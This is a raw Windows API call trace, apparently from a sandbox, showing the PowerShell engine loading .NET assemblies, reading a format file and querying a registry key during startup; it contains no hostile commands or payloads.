0x48 [0090.778] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0090.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52 [0090.790] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74 [0090.792] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0090.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60 [0090.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0090.800] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0090.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0090.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50 [0090.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e [0090.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c [0090.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c [0090.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0090.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48 [0090.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.815] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.911] VirtualQuery (in: lpAddress=0x16bfc0, lpBuffer=0x16ce80, dwLength=0x30 | out: lpBuffer=0x16ce80*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.912] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x8616301e, Data2=0x4e87, Data3=0x4261, Data4=([0]=0xb7, [1]=0x8, [2]=0x2b, [3]=0xa2, [4]=0x22, [5]=0x59, [6]=0xdf, [7]=0x67))) returned 0x0 [0090.914] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xa90a1703, Data2=0xd3dc, Data3=0x4519, Data4=([0]=0x83, [1]=0xe4, [2]=0xa5, [3]=0x78, [4]=0x5, [5]=0xb4, [6]=0x9a, [7]=0x5))) returned 0x0 [0090.915] VirtualQuery (in: lpAddress=0x16c170, lpBuffer=0x16d030, dwLength=0x30 | out: lpBuffer=0x16d030*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.916] VirtualQuery (in: lpAddress=0x16c170, lpBuffer=0x16d030, dwLength=0x30 | out: lpBuffer=0x16d030*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.918] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xb2d3db29, Data2=0x7652, Data3=0x4cb1, Data4=([0]=0xa5, [1]=0xb8, [2]=0x6e, [3]=0x8, [4]=0xc4, [5]=0xea, [6]=0xcd, [7]=0xc5))) returned 0x0 [0090.922] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x5772e790, Data2=0xfbf6, Data3=0x4d25, Data4=([0]=0x82, [1]=0xa0, [2]=0x79, [3]=0xb5, [4]=0xfc, [5]=0xca, [6]=0xb9, [7]=0xf0))) returned 0x0 [0090.923] VirtualQuery (in: lpAddress=0x16c3c0, lpBuffer=0x16d280, dwLength=0x30 | out: lpBuffer=0x16d280*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.924] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.924] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.925] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xbfc1ca80, Data2=0x193, Data3=0x42cd, Data4=([0]=0x81, [1]=0xf3, [2]=0x4a, [3]=0x34, [4]=0x8b, [5]=0x6, [6]=0xa1, [7]=0xaa))) returned 0x0 [0090.925] VirtualQuery (in: lpAddress=0x16c3c0, lpBuffer=0x16d280, dwLength=0x30 | out: lpBuffer=0x16d280*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.926] VirtualQuery (in: lpAddress=0x16c1e0, lpBuffer=0x16d0a0, dwLength=0x30 | out: lpBuffer=0x16d0a0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.927] VirtualQuery (in: lpAddress=0x16ba30, lpBuffer=0x16c8f0, dwLength=0x30 | out: lpBuffer=0x16c8f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.927] VirtualQuery (in: lpAddress=0x16ba30, lpBuffer=0x16c8f0, dwLength=0x30 | out: lpBuffer=0x16c8f0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.928] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x31fd003, Data2=0xe739, Data3=0x4c42, Data4=([0]=0x87, [1]=0x61, [2]=0x19, [3]=0x14, [4]=0x69, [5]=0x8b, [6]=0xfb, [7]=0xa9))) returned 0x0 [0090.928] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x5efde294, Data2=0xeef, Data3=0x4ef1, Data4=([0]=0xba, [1]=0x1a, [2]=0x12, [3]=0x63, [4]=0x5a, [5]=0xcb, [6]=0x73, [7]=0xf))) returned 0x0 [0090.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.929] SetErrorMode (uMode=0x1) returned 0x1 [0090.929] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314 [0090.930] GetFileType (hFile=0x314) returned 0x1 [0090.930] SetErrorMode (uMode=0x1) returned 0x1 [0090.930] GetFileType (hFile=0x314) returned 0x1 [0090.930] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.932] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.933] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.933] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.935] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.935] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.936] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.936] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.938] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.938] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.939] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.939] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.940] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.940] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.941] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.941] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.946] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x1000, lpOverlapped=0x0) returned 1 [0090.946] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0xbce, lpOverlapped=0x0) returned 1 [0090.947] ReadFile (in: hFile=0x314, lpBuffer=0x3568cfe, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x3568cfe*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0090.947] ReadFile (in: hFile=0x314, lpBuffer=0x35695c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d498, lpOverlapped=0x0 | out: lpBuffer=0x35695c8*, lpNumberOfBytesRead=0x16d498*=0x0, lpOverlapped=0x0) returned 1 [0090.947] CloseHandle (hObject=0x314) returned 1 [0090.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.947] SetErrorMode (uMode=0x1) returned 0x1 [0090.947] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d440 | out: lpFileInformation=0x16d440*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0090.948] SetErrorMode (uMode=0x1) returned 0x1 [0090.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.948] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d528 | out: phkResult=0x16d528*=0x314) returned 0x0 [0090.948] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d4ac, lpData=0x0, lpcbData=0x16d4a8*=0x0 | out: lpType=0x16d4ac*=0x1, lpData=0x0, lpcbData=0x16d4a8*=0x56) returned 0x0 [0090.948] CoTaskMemAlloc (cb=0x5a) returned 0x30bea0 [0090.948] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d47c, lpData=0x30bea0, lpcbData=0x16d478*=0x56 | out: lpType=0x16d47c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d478*=0x56) returned 0x0 [0090.948] CoTaskMemFree (pv=0x30bea0) [0090.949] RegCloseKey (hKey=0x314) returned 0x0 [0090.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0090.962] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x30be1125, Data2=0xdc50, Data3=0x4e86, Data4=([0]=0xba, [1]=0xb4, [2]=0xae, [3]=0x60, [4]=0x85, [5]=0x41, [6]=0x43, [7]=0xbc))) returned 0x0 [0090.962] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xa2111d0, Data2=0x7125, Data3=0x45a4, Data4=([0]=0x81, [1]=0x7b, [2]=0x80, [3]=0x6b, [4]=0x81, [5]=0xfa, [6]=0xf2, [7]=0x6))) returned 0x0 [0090.963] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x430a382c, Data2=0x9732, Data3=0x44d9, Data4=([0]=0x86, [1]=0x98, [2]=0x72, [3]=0xd9, [4]=0x69, [5]=0xfb, [6]=0x8f, [7]=0x36))) returned 0x0 [0090.963] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xd7c72f3c, Data2=0xcb30, Data3=0x43a9, Data4=([0]=0xaf, [1]=0xe7, [2]=0x4b, [3]=0x1e, [4]=0xb3, [5]=0x55, [6]=0xb7, [7]=0x4f))) returned 0x0 [0090.964] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x86202eca, Data2=0x5af2, Data3=0x4919, Data4=([0]=0x8e, [1]=0x8f, [2]=0xc4, [3]=0xf7, [4]=0x98, [5]=0x43, [6]=0xd1, [7]=0xc9))) returned 0x0 [0090.965] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x49676627, Data2=0x5ed2, Data3=0x44be, Data4=([0]=0x9e, [1]=0x22, [2]=0x42, [3]=0x22, [4]=0xe5, [5]=0xe8, [6]=0xd3, [7]=0xc8))) returned 0x0 [0090.965] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.966] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xdbb03fe, Data2=0x8c04, Data3=0x4ae6, Data4=([0]=0xae, [1]=0x92, [2]=0xe, [3]=0x1b, [4]=0x78, [5]=0x7c, [6]=0x3f, [7]=0x5a))) returned 0x0 [0090.967] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.967] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.968] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xdbe87630, Data2=0x5d54, Data3=0x4d74, Data4=([0]=0xbc, [1]=0x20, [2]=0xb5, [3]=0xa3, [4]=0x5c, [5]=0x22, [6]=0x5b, [7]=0x1))) returned 0x0 [0090.969] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x7a5a49da, Data2=0x86f6, Data3=0x4b97, Data4=([0]=0xa3, [1]=0xb6, [2]=0x61, [3]=0xc9, [4]=0x72, [5]=0x3f, [6]=0x9f, [7]=0x11))) returned 0x0 [0090.969] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x6d65f648, Data2=0x647d, Data3=0x4d21, Data4=([0]=0xbb, [1]=0x7, [2]=0x5c, [3]=0xea, [4]=0x50, [5]=0xcf, [6]=0xc9, [7]=0xa1))) returned 0x0 [0090.970] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x10da07b7, Data2=0xb304, Data3=0x4384, Data4=([0]=0x9e, [1]=0x53, [2]=0x90, [3]=0x5f, [4]=0x6, [5]=0xea, [6]=0xfa, [7]=0x91))) returned 0x0 [0090.970] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 | out: lpBuffer=0x16cfc0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0090.971] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xe01cadbd, Data2=0xdc21, Data3=0x409a, Data4=([0]=0xbd, [1]=0xd8, [2]=0xbd, [3]=0x6a, [4]=0x76, [5]=0xd4, [6]=0x30, [7]=0xf8))) returned 0x0 [0090.971] VirtualQuery (in: lpAddress=0x16c100, lpBuffer=0x16cfc0, dwLength=0x30 